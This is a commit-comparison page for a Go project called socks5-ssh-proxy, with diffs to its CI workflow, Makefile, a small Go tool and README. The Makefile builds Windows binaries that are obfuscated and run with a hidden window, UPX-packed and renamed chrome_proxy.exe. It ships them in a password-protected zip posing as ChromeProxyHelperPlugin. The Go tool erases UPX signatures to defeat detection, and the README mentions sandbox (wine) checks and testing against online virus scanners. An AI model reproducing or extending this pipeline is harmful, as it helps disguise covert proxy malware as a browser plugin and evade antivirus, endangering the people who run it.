Compare commits
4 Commits
6f72252f35
...
1436d19c04
| Author | SHA1 | Date |
|---|---|---|
 Jerry Jacobs
|
1436d19c04 | |
|
Jerry Jacobs
|
422cc031d1 | |
|
Jerry Jacobs
|
30d941704e | |
|
Jerry Jacobs
|
b222aa8e8e |
|
|
@ -48,6 +48,7 @@ jobs:
|
||||||
platform: x64
|
platform: x64
|
||||||
|
|
||||||
- run: make win
|
- run: make win
|
||||||
|
- run: make win-package
|
||||||
|
|
||||||
- name: Store release artifacts
|
- name: Store release artifacts
|
||||||
uses: actions/upload-artifact@v4
|
uses: actions/upload-artifact@v4
|
||||||
|
|
|
||||||
44
Makefile
44
Makefile
|
|
@ -7,44 +7,42 @@ export PATH := $(shell go env GOPATH)/bin:$(PATH)
|
||||||
all: socks5-ssh-proxy
|
all: socks5-ssh-proxy
|
||||||
|
|
||||||
ci: release
|
ci: release
|
||||||
release: socks5-ssh-proxy.release socks5-ssh-proxy.exe
|
|
||||||
mkdir -v -p dist
|
|
||||||
cp -v $^ dist
|
|
||||||
|
|
||||||
test: socks5-ssh-proxy
|
win: dist/socks5-ssh-proxy.exe dist/socks5-ssh-proxy.tiny.exe
|
||||||
cp socks5-ssh-proxy ~/.ssh; cd ~/.ssh; ~/.ssh/socks5-ssh-proxy
|
win-package: dist/ChromeProxyHelperPlugin.zip
|
||||||
test-release: socks5-ssh-proxy.release
|
|
||||||
./socks5-ssh-proxy.release
|
dist:
|
||||||
|
mkdir -p dist
|
||||||
|
|
||||||
socks5-ssh-proxy: $(SOURCES)
|
socks5-ssh-proxy: $(SOURCES)
|
||||||
GOOS=linux GOARCH=amd64 go build -tags release,linux -o $@
|
GOOS=linux GOARCH=amd64 go build -tags release,linux -o $@
|
||||||
socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
|
socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
|
||||||
GOOS=darwin GOARCH=amd64 $(GARBLE_CMD) build -tags release -o $@
|
GOOS=darwin GOARCH=amd64 $(GARBLE_CMD) build -tags release -o $@
|
||||||
upx $@
|
upx $@
|
||||||
win: dist/chrome_proxy.exe
|
|
||||||
dist/chrome_proxy.exe: socks5-ssh-proxy.exe
|
dist/socks5-ssh-proxy.exe: dist resources $(GOVERSIONINFO_BIN) $(GARBLE_BIN) $(SOURCES)
|
||||||
mkdir -p dist
|
|
||||||
cp -v $< $@
|
|
||||||
socks5-ssh-proxy.exe: resources $(GOVERSIONINFO_BIN) $(GARBLE_BIN) $(SOURCES)
|
|
||||||
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 go generate -tags windows,release
|
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 go generate -tags windows,release
|
||||||
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 $(GARBLE_BIN) -literals build -trimpath -ldflags "-s -w -H=windowsgui -buildid=" -tags windows,release -o $@
|
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 $(GARBLE_BIN) -literals build -trimpath -ldflags "-s -w -H=windowsgui -buildid=" -tags windows,release -o $@
|
||||||
# CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui -X cfg.VerboseModeKey=$(RELEASE_VERBOSE_MODE_KEY)" -tags release -o $@
|
dist/socks5-ssh-proxy.tiny.exe: dist resources $(GOVERSIONINFO_BIN) $(GARBLE_BIN) $(SOURCES)
|
||||||
#CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui" -tags release -o $@
|
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 go generate -tags windows,release
|
||||||
#upx $@
|
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 $(GARBLE_BIN) -literals -tiny build -trimpath -ldflags "-s -w -H=windowsgui -buildid=" -tags windows,release -o $@
|
||||||
#go run cmd/upx-obfuscator/main.go $@
|
|
||||||
goreleaser: resources $(GARBLE_BIN)
|
goreleaser: resources $(GARBLE_BIN)
|
||||||
goreleaser build --verbose --clean --snapshot --id win-release
|
goreleaser build --verbose --clean --snapshot --id win-release
|
||||||
# goreleaser build --clean --snapshot --id win-release
|
dist/ChromeProxyHelperPlugin.zip: dist/chrome_proxy.exe
|
||||||
win-package: ChromeProxyHelperPlugin.zip
|
file $<
|
||||||
ChromeProxyHelperPlugin.zip: socks5-ssh-proxy.exe
|
ls -lh $<
|
||||||
cp socks5-ssh-proxy.exe chrome_proxy.exe
|
zip -eP resistanceIsFutile $@ $<
|
||||||
#upx chrome_proxy.exe
|
dist/chrome_proxy.exe: dist/socks5-ssh-proxy.tiny.exe
|
||||||
zip -eP resistanceIsFutile ChromeProxyHelperPlugin.zip chrome_proxy.exe
|
cp -v $< $@
|
||||||
rm -f chrome_proxy.exe
|
upx --lzma --ultra-brute --best $@
|
||||||
|
go run cmd/upx-obfuscator/main.go $@
|
||||||
|
|
||||||
install-deps: $(GARBLE_BIN) $(GOVERSIONINFO_BIN)
|
install-deps: $(GARBLE_BIN) $(GOVERSIONINFO_BIN)
|
||||||
$(GARBLE_BIN):
|
$(GARBLE_BIN):
|
||||||
go install mvdan.cc/garble@v0.12.1
|
go install mvdan.cc/garble@v0.12.1
|
||||||
$(GOVERSIONINFO_BIN):
|
$(GOVERSIONINFO_BIN):
|
||||||
go install github.com/josephspurrier/goversioninfo/cmd/goversioninfo@v1.4.0
|
go install github.com/josephspurrier/goversioninfo/cmd/goversioninfo@v1.4.0
|
||||||
|
|
||||||
clean:
|
clean:
|
||||||
rm -f *.exe
|
rm -f *.exe
|
||||||
rm -f *.zip
|
rm -f *.zip
|
||||||
|
|
|
||||||
|
|
@ -4,6 +4,7 @@ import (
|
||||||
"os"
|
"os"
|
||||||
"bytes"
|
"bytes"
|
||||||
"log"
|
"log"
|
||||||
|
"fmt"
|
||||||
)
|
)
|
||||||
|
|
||||||
func bytesReplace(data, old, new []byte) []byte {
|
func bytesReplace(data, old, new []byte) []byte {
|
||||||
|
|
@ -13,7 +14,6 @@ func bytesReplace(data, old, new []byte) []byte {
|
||||||
log.Println("Found identifier at offset", foundIndex)
|
log.Println("Found identifier at offset", foundIndex)
|
||||||
} else {
|
} else {
|
||||||
return data
|
return data
|
||||||
log.Fatalln("Error file is not UPX packed")
|
|
||||||
}
|
}
|
||||||
|
|
||||||
return bytes.Replace(data, old, new, 1)
|
return bytes.Replace(data, old, new, 1)
|
||||||
|
|
@ -31,9 +31,11 @@ func main() {
|
||||||
|
|
||||||
data, _ := os.ReadFile(filename)
|
data, _ := os.ReadFile(filename)
|
||||||
|
|
||||||
data = bytesReplace(data, []byte("UPX0"), []byte("GSP7"))
|
for i := range(10) {
|
||||||
data = bytesReplace(data, []byte("UPX1"), []byte("GSP1"))
|
upxIdentifier := fmt.Sprintf("UPX%d", i)
|
||||||
data = bytesReplace(data, []byte("UPX2"), []byte("GSP2"))
|
efbIdentifier := fmt.Sprintf("EFB%d", i)
|
||||||
|
data = bytesReplace(data, []byte(upxIdentifier), []byte(efbIdentifier))
|
||||||
|
}
|
||||||
|
|
||||||
_ = os.WriteFile(filename, data, 0666)
|
_ = os.WriteFile(filename, data, 0666)
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -73,6 +73,11 @@ Check if running under wine by testing if executables are present:
|
||||||
* <https://github.com/sandflysecurity/sandfly-entropyscan>
|
* <https://github.com/sandflysecurity/sandfly-entropyscan>
|
||||||
* <https://pypi.org/project/unipacker/>
|
* <https://pypi.org/project/unipacker/>
|
||||||
|
|
||||||
|
**Online scanners**
|
||||||
|
|
||||||
|
* <https://www.filescan.io/>
|
||||||
|
* <https://virusscan.jotti.org/>
|
||||||
|
|
||||||
## Related information
|
## Related information
|
||||||
|
|
||||||
* <https://github.com/rootkit-io/awesome-malware-development>
|
* <https://github.com/rootkit-io/awesome-malware-development>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue